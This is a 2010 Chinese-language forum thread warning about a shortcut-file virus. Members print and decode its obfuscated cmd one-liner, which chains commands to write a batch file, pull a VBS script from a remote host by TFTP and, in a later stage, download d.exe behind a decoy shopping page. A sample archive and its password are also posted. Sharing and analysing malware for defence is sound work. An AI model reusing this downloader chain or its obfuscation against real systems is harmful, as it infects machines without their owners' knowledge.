作者 主題: 最近發現有密集出現的情形... 編碼+連結+緩衝溢位攻擊型的病毒......  (閱讀 15847 次)

0 會員 與 1 訪客 正在閱讀本文。

日京三子

  • 全區板主
  • 俺是博士!
  • *****
  • 文章數: 8832
    • 檢視個人資料
    • http://www.24online.cjb.net
這陣子發現,這類利用編碼的手法,讓使用者就算經過掃毒之後,也一定會中毒........

[attachment=1] 解壓縮密碼:「study-area」

為甚麼呢?
第一,在你解開壓縮之後,看到一個怪異的文字檔





第二,小心的點開之後,在「內容」的地方可以看到......

代碼: [選擇]
%cOmsPeC% /c sEt c=ET GE&seT E=T k.Vb&ECho %g%p %G%Ft.N%C%t %e%s>ll.BAt&Set g=TFt&EcHo stAr%E%s>>LL.bAT&you_will_download_a_Virus.BAt 第三,上面這串,如果你在cmd 裡面貼上,就會下載一個BAT,裡面的內容又是經過編碼的純文字訊息.....



(因為三子很怕死,所以那個被執行的指令有經過小小的修改,跟病毒內容其實有所不同,敬請見諒^^)

經過執行,就會產生這樣的訊息......
代碼: [選擇]
C:\>%g%p %G%Ft.N%C%t %e%s

Transfers files to and from a remote computer running the TFTP service.

TFTP [-i] host [GET | PUT] source [destination]

  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.
  host            Specifies the local or remote host.
  GET             Transfers the file destination on the remote host to
                  the file source on the local host.
  PUT             Transfers the file source on the local host to
                  the file destination on the remote host.
  source          Specifies the file to transfer.
  destination     Specifies where to transfer the file.

上面的命令會從火星抓來一個檔案,這檔案就是一個vbscript,也就是病毒本體,用來修改系統登錄資料庫裡面的內容(會改哪些部份我就不知道了,沒繼續跑下去)

代碼: [選擇]
C:\>stAr%E%s
系統找不到檔案 k.Vbs。

如果你不是像三子一樣,每一段都是分開來執行,而是快樂的在一開始的地方就大意的點下去執行;到這裡,你的系統就跟你說bye bye了!

------------
這種招式最近滿流行的,各位朋友請多加小心;最好是把vbs這類檔案給限制住,不然你就有得忙了^^
« 上次編輯: 2010-01-11 10:36 由 日京三子 »
哈克不愛的多合一輸入平台----->新香草口味
過去的時間不斷流逝,抹去的眼淚已成追憶;
乾枯的雙手無力阻止,再會了我遠去的曾經。

jou

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 4989
  • 性別: 男
    • 檢視個人資料
哈哈! 我用 gnome 的壓縮管理員開啟
不用輸入密碼,出現"泵誚.lnk" 的目錄跟文字檔
但是無法看到檔案內容。

dscwferp

  • 憂鬱的高中生
  • ***
  • 文章數: 157
    • 檢視個人資料
我都是寫 vbs 來管理系統的耶!
那 vbs 就不能被限制了?
不是很危險?
no! no! no!
是要跟三子一樣: 小心!小心! 再小心!
小心駛的萬年船!
看到奇怪的 先不要下載 不要打開 不要按下去!
問問 google or 原作者 or 三子
了解後才打開!
MSN:dscwferp@yahoo.com.tw
ERP民國百年序問題解決!
舊ERP在新WIN7上相容問題解決!
http://dscwferp.blogspot.com/

redjack

  • 活潑的大學生
  • ***
  • 文章數: 426
    • 檢視個人資料
請教一下
為什麼這個東西:%cOmsPeC% 在ie 中會變成:file:///C:/WINDOWS/system32/cmd.exe

那個字串該怎麼拆開解讀啊?
我猜%cC%這個是用來表示SYSTEM32 路徑底下的指令,這樣對嗎?
Knowledge is Power

dscwferp

  • 憂鬱的高中生
  • ***
  • 文章數: 157
    • 檢視個人資料
請教一下
為什麼這個東西:%cOmsPeC% 在ie 中會變成:file:///C:/WINDOWS/system32/cmd.exe

那個字串該怎麼拆開解讀啊?
我猜%cC%這個是用來表示SYSTEM32 路徑底下的指令,這樣對嗎?
%cOmsPeC% 是 win 的 內定系統參數
打 set 就可以看到
ComSpec=C:\Windows\system32\cmd.exe
MSN:dscwferp@yahoo.com.tw
ERP民國百年序問題解決!
舊ERP在新WIN7上相容問題解決!
http://dscwferp.blogspot.com/

slime

  • 俺是博士!
  • *****
  • 文章數: 1692
    • 檢視個人資料
ComSpec 是 Windows 的特定變數.

在 Windows 命令提示字元, 可以直接打 set 看到已經建立的變數.
冷笑話: 我的 IP 是 127.0.0.1

dscwferp

  • 憂鬱的高中生
  • ***
  • 文章數: 157
    • 檢視個人資料
回覆: 最近發現有密集出現
« 回覆 #6 於: 2010-01-11 13:37 »
這個是用 大小寫混淆視線 + 用  設定參數 將指令隱藏 + "&" 符號連結指令後
下載 k.vbs
執行 k.vbs
vbs 裡面又用 chr() 函數 將 acaii 號碼 轉成 字元
組合成跟一開始一樣bat 指令
呼叫 Shell 執行那一串bat 指令
會開啟yahoo購物網站來掩飾背景的指令
背景指令
又是去下載
這次是 d.exe
這個才是真正病毒!
前面有 yahoo購物網站來掩飾
背景有 d.exe 病毒再跑 誰會去注意?
中毒了!!!
« 上次編輯: 2010-01-11 13:40 由 dscwferp »
MSN:dscwferp@yahoo.com.tw
ERP民國百年序問題解決!
舊ERP在新WIN7上相容問題解決!
http://dscwferp.blogspot.com/

threeseconds

  • 俺是博士!
  • *****
  • 文章數: 1368
    • 檢視個人資料
    • http://www.3sec.tw
這種類型病毒出現有一陣子了,我忘了在哪個論壇講過,
最簡單的方法之一,就是在 firewall 的 URL Filter 上面直接擋掉 .lnk
正常情況沒人會把捷徑放在網路上給人下載吧?
如果有就一定是病毒了。
本文作者為天線寶寶,長期關注兒童智力發展狀態。

Error404

  • 懷疑的國中生
  • **
  • 文章數: 31
    • 檢視個人資料
可以透過工具,打開是否顯示*.lnk *.pif , *.scf ,*.url 後縒

這樣自己一看就會有習慣性的點選右鍵看下內容.
而且也很好認.

這早期出現yahoo mail & yahoo messenger 的zip 病毒最多.

dark

  • 俺是博士!
  • *****
  • 文章數: 1581
    • 檢視個人資料
小弟也中招了

昨天隔壁台電腦中毒
快捷列上的 IE 捷徑被換掉
如上述 .. 連結制網路上執行檔
啟動資料夾也有好幾個這類捷徑

剛剛桌機也中了
只是不知是不是昨天隔壁台影響
若是 .. 可懷疑的途徑有 1. 網芳  2. 遠端桌面

為何還移遠端桌面呢 ?
因為如小弟使用遠端桌面 , 會開啟磁碟連結 , 右鍵複製
有時候 URL 一貼就 enter , 才發現用錯台
那不知設計者有沒有多多利用右鍵複製功能而設計
這佔存區要是也有夠洞就可怕了

這類木馬似乎會植入系統文件中
中毒後 avast 無法解開 , 只能刪除
導致連 XP 都開不起來 , 只好重灌了

------------

真是欺人太甚 ...
輸入法被改成簡體輸入

因為小弟家目錄是獨立磁區
重灌完 , 掃完毒 , 掛回則是原來環境
奇怪的是 .. 重灌前首頁是被改掉的
現在登入原來環境 , 首頁不變
仍是我 local 端文件
« 上次編輯: 2010-04-18 18:22 由 dark »